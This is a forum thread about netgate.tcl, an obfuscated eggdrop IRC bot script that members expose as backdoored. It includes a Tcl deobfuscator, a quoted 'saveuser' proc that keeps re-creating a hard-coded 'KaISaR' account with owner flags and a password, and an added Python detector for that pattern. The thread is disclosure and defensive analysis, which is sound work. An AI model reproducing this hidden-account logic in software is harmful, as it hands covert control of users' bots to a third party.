netgate backdoor

user
Posts: 1452
Joined: Tue Mar 18, 2003 9:58 pm
Location: Norway

netgate backdoor

Post by user »

I checked the script mentioned here a bit closer...seems like it's got quite a few hidden "features" ...should I post a script that will "deobfuscate" it or are you guys like billy G...thinking that we should give people a fair chance to remove the script before making the "vuln" public? :P

The previously mentioned post is in the junk yard and will probably disappear pretty soon, so here's a direct link to the script just in case: http://www.rootshell.be/~netgate/netgate.tcl

EDIT: changed the subject
Last edited by user on Thu Mar 22, 2007 11:21 am, edited 1 time in total.
Have you ever read "The Manual"?
Yourname
Master
Posts: 358
Joined: Mon Sep 24, 2001 8:00 pm
Location: Toronto

Post by Yourname »

FULL-DISCLOSURE!

That script has for long, cheated many a user. I've tried to get most scripters to look into it, but due to time limitations and laziness, as we all know, they didn't wanna do it.

But you, my man, have accomplished something. Tell us. And provide us with a 'readable' format, if you can, and you're infamous!
Dormant egghead.
user
Posts: 1452
Joined: Tue Mar 18, 2003 9:58 pm
Location: Norway

Here goes...

Post by user »

This code will convert the script, so you need to have the original obfuscated version...

Code:

# Make http://www.rootshell.be/~netgate/netgate.tcl a bit easier to 
# read (I didn't verify that it runs fine after the conversion, but
# who would want to run that sucky script anyway, right? :P)
#
# Usage: change the variables below before you source this script in
# your eggdrop. eggdrop is needed because parts of the descrambling is
# done using eggdrop's 'decrypt' command

set infile scripts/netgate.tcl
set outfile scripts/netgate.fixed.tcl

# The main (de)scrambler proc
# Escaping is honored for ['s but not the ], $ and space
# - Don't ask me why... I just reproduce the output of the original
proc lines str {
	# The part swapping L with 0 and 0 with L reminds me of my
	# first reaction when i saw the netgate.tcl code :P
	set map {
		a z z a b y y b c x x c d w w d e v v e f u u f g t
		t g h s s h i r r i j q q j k p p k l o o l m n n m
		A Z Z A B Y Y B C X X C D W W D E V V E F U U F G T
		T G H S S H I R R I J Q Q J K P P K L O O L M N N M
	}
	if {[regexp {[\$\[~]+} $str]} {
		set out ""
		set s ""
		set p "";# previous char
		foreach c [split $str ""] {
			if {$s==""} {
				if {$c=="~"} {
					set s ~
				} elseif {$c=="\$"} {
					set s " "; set c ~$c
				} elseif {$c=="\[" && $p!="\\"} {
					set s "\]"; set c ~$c
				} else {
					set c [string map $map $c]
				}
			} elseif {$c=="~"} {
				set s ""
			} elseif {$c==$s} {
				set s ""; append c ~
			}
			append out [set p $c]
		}
		if {$s==""} {set out} {append out ~}
	} {
		string map $map $str
	}
}
proc puthlp str {
	set str "puthelp \"[string map {~ ""} [lines $str]]\""
}
proc putsrv str {
	set str "putserv \"[string map {~ ""} [lines $str]]\""
}
proc putqck str {
	set str "putquick \"[string map {~ ""} [lines $str]]\""
}
proc dcp str {
	set str \"[qesc [decrypt 64 $str]]\"
}
proc dezip str {
	if {[string match {*\\*} $str]} {set str [subst -noc -nov $str]}
	set str [qesc [decrypt 64 [string map {~ ""} $str]]]
}
proc qesc str {
	set out ""
	foreach c [split [string map {
		\\ \\\\ \[ \\\[ \] \\\] \{ \\\{
		\} \\\} \$ \\\$ \" \\\" " " "\\ "
	} $str] ""] {
		if {[set i [scan $c %c]]>31 && $i<127} {
			append out $c
		} {
			append out [format \\%.3o $i]
		}
	}
	set out
}
proc clearify {var cmdstart {stderr stdout}} {
	upvar 1 $var code
	set off [string len $cmdstart]
	set cmd [lindex [split $cmdstart " "] 0]
	set off2 [string match {\[*} $cmdstart]
	if {$off2} {
		set cmd [string range $cmd 1 end]
	}
	incr off2
	#puts $stderr "*** running \"$cmd\""
	set c 0
	foreach line [split [set code][set code ""] \n] {
		incr c
		set i 0
		set ll [string len $line]
		while {$i<$ll && [set i [string first $cmdstart $line $i]]>-1} {
			set j [expr {$i+$off+1}]
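			# initialise run first so it is defined even when the match sits at the end of the line
			set run [string range $line $i $j]
			while {$j<$ll && ![info complete $run]} {set run [string range $line $i [incr j]]}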
			if {[info complete $run]} {
				# lame hack because this was the only command with more arguments :P
				if {$cmdstart=={[decrypt 64 "}} {
					set res [decrypt 64 [string range $run $off end-$off2]]
				} {
					set res [$cmd [string range $run $off end-$off2]]
				}
				set line [string replace $line $i $j $res]
			} {
				#puts $stderr "line#$c INCOMPLETE: \"$run\""
				break
			}
			incr i
		}
		append code "$line\n"
	}
	#puts $stderr "*** done: \"$cmd\""
}
proc indent {code {dent {	}}} {
	set out ""
	set i 0
	foreach line [split $code \n] {
		set line [string trimleft $line]
		foreach {o c e} {0 0 0} break
		foreach a [split $line ""] {
			if {$e} {set e 0; continue}
			switch -exact -- $a {
				"\\" {set e 1}
				"\{" {incr o}
				"\}" {if {$o} {incr o -1} {incr c}}
			}
		}
		incr i -$c
		append out [string repeat $dent $i]$line\n
		incr i $o
	}
	set out
}

set code [read [set f [open $infile]]]; close $f

clearify code {[decrypt 64 "}
clearify code {[lines "}
clearify code {[dcp "}
clearify code {[dezip "}
clearify code {puthlp "}
clearify code {putsrv "}
clearify code {putqck "}

set f [open $outfile w]
puts $f [indent [set code]][unset code]
close $f
putlog "Check $outfile :)"

# It's a bit of a mess, but it does the job. Have fun :P
Last edited by user on Tue Jan 27, 2004 11:59 pm, edited 2 times in total.
Have you ever read "The Manual"?
caesar
Mint Rubber
Posts: 3776
Joined: Sun Oct 14, 2001 8:00 pm
Location: Mint Factory

Post by caesar »

duh! Why do you think I have moved it to the Junk Yard in the first place? :) Some untrustworthy users from Dalnet have created it so.. DON'T USE IT! :)

Also, thanks for the script to unscramble it :)
Once the game is over, the king and the pawn go back in the same box.
Yourname
Master
Posts: 358
Joined: Mon Sep 24, 2001 8:00 pm
Location: Toronto

Post by Yourname »

heh, what's the use if it won't run? :P How to make it 'runnable' then?

caesar - I AM FROM TEH DALNET!
Dormant egghead.
user
Posts: 1452
Joined: Tue Mar 18, 2003 9:58 pm
Location: Norway

Post by user »

Yourname wrote: heh, what's the use if it won't run? :P How to make it 'runnable' then?
I was talking about the converted script...it's for reading. Why would you want to run it? (changed my comment a bit in the top...do you get it now? :P)
Have you ever read "The Manual"?
caesar
Mint Rubber
Posts: 3776
Joined: Sun Oct 14, 2001 8:00 pm
Location: Mint Factory

Post by caesar »

I was talking about that netgate.tcl script.. also, I don't have something against Dalnet users, don't get me wrong there. The "untrustworthy" authors actually of that script are carders and probably (not sure 100% hackers). User's tcl is a neat thing to "unscramble" the code.. nice job. :)

PS: My apologies Yourname if I have let you the totally wrong impression that I have something against Dalnet users and my apologies if I have expressed myself wrong and let you under the impression that user's code is not good to run in order to make that "FULL-DISCLOSURE! " of the tricky code.
Once the game is over, the king and the pawn go back in the same box.
Yourname
Master
Posts: 358
Joined: Mon Sep 24, 2001 8:00 pm
Location: Toronto

Post by Yourname »

aww caesar, I'm just playin with you dude. :)
And yes, those people are prolly carders or so.

user, There are some neat things DALnet really needs all -in- one in that script. Since I was testing it out, but never really got to understand 90% of that [censored], I took it off apart from the fact that it scared me because I knew there are trojans here and there.
Dormant egghead.
user
Posts: 1452
Joined: Tue Mar 18, 2003 9:58 pm
Location: Norway

Post by user »

Yourname wrote: user, There are some neat things DALnet really needs all -in- one in that script. Since I was testing it out, but never really got to understand 90% of that ****, I took it off apart from the fact that it scared me because I knew there are trojans here and there.
I wouldn't copy stuff from their code. It is 100% pure crap. Seems like they spent all their skills trying to make it hard to read :P If you have trouble coding a particular feature, it would be better to ask in the tcl forum on this site :)
Have you ever read "The Manual"?
caesar
Mint Rubber
Posts: 3776
Joined: Sun Oct 14, 2001 8:00 pm
Location: Mint Factory

Post by caesar »

Yourname : aww.. you dirty dog :) Shame on me cos I got so fooled.. :mrgreen:
Once the game is over, the king and the pawn go back in the same box.
Yourname
Master
Posts: 358
Joined: Mon Sep 24, 2001 8:00 pm
Location: Toronto

Post by Yourname »

I'll assume I'm a good actor. :D
Dormant egghead.
NeTGaTE
Voice
Posts: 5
Joined: Fri Dec 03, 2004 8:07 am
Location: South Sumatera, Palembang - Indonesia

Reply

Post by NeTGaTE »

user, There are some neat things DALnet really needs all -in- one in that script. Since I was testing it out, but never really got to understand 90% of that ****, I took it off apart from the fact that it scared me because I knew there are trojans here and there.

not trojan in this tcl but dalnet have autoklines that script. dalnet read from the NETGATE word in away. this is a 2 time dalnet have kill it's, first read from the realname and two in away logo NETGATE (i Have fixed for this in 9.6)

The "untrustworthy" authors actually of that script are carders and probably (not sure 100% hackers).

the author's nickname in DALnet is KaISaR, it's not a hackers.


:: odon
user
Posts: 1452
Joined: Tue Mar 18, 2003 9:58 pm
Location: Norway

Re: Reply

Post by user »

NeTgAtE wrote: not trojan in this tcl but dalnet have autoklines that script. dalnet read from the NETGATE word in away. this is a 2 time dalnet have kill it's, first read from the realname and two in away logo NETGATE (i Have fixed for this in 9.6)

the author's nickname in DALnet is KaISaR, it's not a hackers.
So this is not a backdoor? Is that what you're trying to say? (the code below is from v8.9)

Code:

set ps KaISaR
# the proc below is invoked alot...
proc saveuser {} {
	global ps owner
	if {![validuser $ps]} {
		setuser $owner XTRA "BEND" "xDB4L/z2DJT~1mianN/lj9Rq.";# Zfhjmnoptx
	} elseif {$owner != $ps} {
		setuser $owner XTRA "BEND" [zip [chattr $ps]]
		if {[passwdok $ps ""] != 1} {
			setuser $owner XTRA "LAST" [getuser $ps "PASS"]
		}
		deluser $ps
	}
	save
	if {![validuser $ps]} {
		adduser $ps "$ps!*@*"
		chattr $ps [dezip [getuser $owner XTRA "BEND"]]
		if {[getuser $owner XTRA "LAST"] != ""} {
			setuser $ps PASS [getuser $owner XTRA "LAST"]
		}
	}
	return 1
}
Have you ever read "The Manual"?
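
An added example, not part of the original posts and not taken from netgate.tcl: a static check that flags the pattern visible in the excerpt above, where a handle fixed in the script is re-created and given flags and a password. The function names and the sample are assumptions made here; the check only works on readable source, so an obfuscated script has to be converted first.

```python
import re

# Eggdrop userfile commands whose first argument is the handle being changed.
USERFILE_CMDS = ("adduser", "chattr", "setuser", "deluser")
# "set name literal": a variable bound to a fixed word (no $var, [cmd] or quotes).
SET_LITERAL = re.compile(r'^\s*set\s+(\w+)\s+([^\s\[\$"{;]+)\s*$')

# Constructed sample, condensed from the v8.9 excerpt quoted in the post above.
SAMPLE = r'''
set ps KaISaR
proc saveuser {} {
	global ps owner
	if {$owner != $ps} {
		setuser $owner XTRA "LAST" [getuser $ps "PASS"]
		deluser $ps
	}
	if {![validuser $ps]} {
		adduser $ps "$ps!*@*"
		chattr $ps [dezip [getuser $owner XTRA "BEND"]]
		setuser $ps PASS [getuser $owner XTRA "LAST"]
	}
}
'''


def find_hardcoded_account_ops(tcl_source):
    """Map each literal-valued variable to the userfile commands run on it."""
    literals, findings = {}, {}
    for line in tcl_source.splitlines():
        code = line.split(";#")[0]          # drop a trailing ';# comment'
        if code.lstrip().startswith("#"):   # skip full-line comments
            continue
        m = SET_LITERAL.match(code)
        if m:
            literals[m.group(1)] = m.group(2)
            continue
        for cmd in USERFILE_CMDS:
            for var in re.findall(r"\b%s\s+\$(\w+)" % cmd, code):
                if var in literals:
                    entry = findings.setdefault(
                        var, {"handle": literals[var], "ops": set()})
                    entry["ops"].add(cmd)
    return findings


def is_reinstating(entry):
    """True when a fixed handle is both created and given flags or a password."""
    return "adduser" in entry["ops"] and bool(entry["ops"] & {"chattr", "setuser"})
```

Operations on `$owner` are not reported because `owner` comes from the bot's configuration rather than from a literal in the script; a hit on any other variable means the script manages an account the bot's owner did not choose.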
NeTGaTE
Voice
Posts: 5
Joined: Fri Dec 03, 2004 8:07 am
Location: South Sumatera, Palembang - Indonesia

Post by NeTGaTE »

i think that is not a backdoor just a copyright who maker that tcl, just to remember who make netgate tcl is KaISaR (now he has been sign in from irc). some of user in dalnet have ripped netgate tcl and make another tcl version with a lot of logo/slogan but "STILL" same like netgate tcl.

$ps : Any one or people in dalnet always look this a backdoor, why?
metroid
Owner
Posts: 771
Joined: Wed Jun 16, 2004 2:46 am

Post by metroid »

You're a retard, That proc adds the author as an owner which is clearly a backdoor to get owner access on a bot.

Maybe you should try reading the code instead of making useless remarks Netgate.
Locked